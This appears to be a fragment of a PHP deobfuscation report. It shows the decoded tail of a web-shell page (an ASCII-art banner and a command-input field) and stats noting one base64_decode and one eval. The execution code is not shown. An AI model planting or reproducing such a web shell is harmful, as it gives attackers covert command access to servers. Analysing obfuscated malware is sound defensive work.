                <pre>
  _    _          ____  ____   ____  _____           __       __  _   _ 
 | |  | |   /\   |  _ \|  _ \ / __ \|  __ \   /\    / /       \ \| \ | |
 | |__| |  /  \  | |_) | |_) | |  | | |  | | /  \  | |_ __ ___ | |  \| |
 |  __  | / /\ \ |  _ <|  _ <| |  | | |  | |/ /\ \ | | '_ ` _ \| | . ` |
 | |  | |/ ____ \| |_) | |_) | |__| | |__| / ____ \| | | | | | | | |\  |
 |_|  |_/_/    \_\____/|____/ \____/|_____/_/    \_\ |_| |_| |_| |_| \_|
                                                    \_\       /_/       
                                                                                                 
</pre>
                </div>
            </pre>
            <div id="shell-input">
                <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
                <div>
                    <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
                </div>
            </div>
        </div>
    </body>

</htm')); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 5bc59bb13915d74beb72171e59d726b1
Eval Count 1
Decode Time 100 ms